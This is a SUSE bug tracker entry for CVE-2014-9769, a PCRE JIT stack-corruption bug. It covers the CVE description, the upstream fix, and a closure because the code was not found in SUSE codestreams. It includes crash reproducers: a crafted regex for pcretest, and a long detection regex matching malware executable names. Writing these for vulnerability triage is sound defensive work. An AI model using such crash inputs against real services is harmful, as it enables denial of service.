973012 – (CVE-2014-9769) VUL-0: CVE-2014-9769: pcre: Segmentation fault on crafted regex when JIT is used

Bug 973012 (CVE-2014-9769) - VUL-0: CVE-2014-9769: pcre: Segmentation fault on crafted regex when JIT is used

Summary: VUL-0: CVE-2014-9769: pcre: Segmentation fault on crafted regex when JIT is used

Status:	RESOLVED INVALID

Alias:	CVE-2014-9769

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P3 - Medium Severity: Normal
Target Milestone:	---
Assignee:	Stephan Kulow
QA Contact:	Security Team bot

URL:	https://smash.suse.de/issue/164868/
Whiteboard:	CVSSv2:NVD:CVE-2014-9769:7.5:(AV:N/A...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2016-03-29 13:58 UTC by Victor Pereira
Modified:	2016-04-05 12:06 UTC (History)
CC List:	1 user (show)

See Also:
Found By:	Security Response Team
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Victor Pereira 2016-03-29 13:58:34 UTC

rh#1320995

pcre_jit_compile.c in PCRE 8.35 does not properly use table jumps to optimize
nested alternatives, which allows remote attackers to cause a denial of service
(stack memory corruption) or possibly have unspecified other impact via a
crafted string, as demonstrated by packets encountered by Suricata during use of
a regular expression in an Emerging Threats Open ruleset.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1320995
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9769
http://seclists.org/oss-sec/2016/q1/704
http://www.openwall.com/lists/oss-security/2016/03/26/1
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=819050
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9769
https://redmine.openinfosecfoundation.org/issues/1693
http://vcs.pcre.org/pcre?view=revision&revision=1475

Comment 1 Victor Pereira 2016-03-29 13:58:46 UTC

This was fixes with upstream commit:

commit 60f995fc2f823183783633d5eb8af2eceb0bb663
Author: zherczeg <zherczeg@2f5784b3-3f2a-0410-8824-cb99058d5e15>
Date:   Fri Apr 25 11:59:19 2014 +0000

    Fixed an issue with nested table jumps.
    
    git-svn-id: svn://vcs.exim.org/pcre/code/trunk@1475 2f5784b3-3f2a-0410-8824-cb99058d5e15

and fixed in subsequent pcre-8.36 release.

Reproducer from the commit:

$ printf '%s\n%s\n' '/(?:x|(?:(xx|yy)+|x|x|x|x|x)|a|a|a)bc/' 'acb' | ./pcretest -s++
PCRE version 8.35 2014-04-04

  re> Segmentation fault (core dumped)

Comment 2 Swamp Workflow Management 2016-03-29 22:00:23 UTC

bugbot adjusting priority

Comment 3 Victor Pereira 2016-04-05 07:37:05 UTC

reproducer:

echo /a/eaa  |  pcregrep '\/(?:(?:s(?:ystem\/(?:logs|engine)\/[^\x2f]+?|e(?:rv(?:au|er)|ct)|gau\/.*?|alam|ucks|can|ke)|p(?:lugins\/content\/vote\/\.ssl\/[a-z0-9]|(?:rogcicic|atr)ic|osts?\/[a-z0-9]+)|(?=[a-z]*[0-9])(?=[0-9]*[a-z])(?!setup\d+\.exe$)[a-z0-9]{5,10}|a(?:d(?:min\/images\/\w+|obe)|(?:sala|kee)m|live)|(?:i(?:mage\/flags|nvoice)|xml\/load)\/[^\x2f]+|d(?:o(?:c(?:\/[a-z0-9]+)?|ne)|bust)|m(?:edia\/files\/\w+|arch)|~.+?\/\.[^\x2f]+\/.+?|c(?:onfig|hris|alc)|u(?:swinz\w+|pdate)|Ozonecrytedserver|w(?:or[dk]|insys)|fa(?:cture|soo)|n(?:otepad|ach)|k(?:be|ey|is)|(?:tes|ve)t|ArfBtxz|office|yhaooo|[a-z]|etna|link|\d+)\.exe$|(?:(?=[a-z0-9]*?[3456789][a-z0-9]*?[3456789])(?=[a-z0-9]*?[h-z])[a-z0-9]{3,31}\+|PasswordRecovery|RemoveWAT|Dejdisc|Host\d+|Msword)\.exe)'

Comment 4 Victor Pereira 2016-04-05 09:20:28 UTC

I wasnt able to reproduce it on SLE12, and SLE-11-SP4.

Comment 5 Victor Pereira 2016-04-05 12:06:56 UTC

I wasn't able to find the vulnerable code in any of our codestreams. I will close this bug.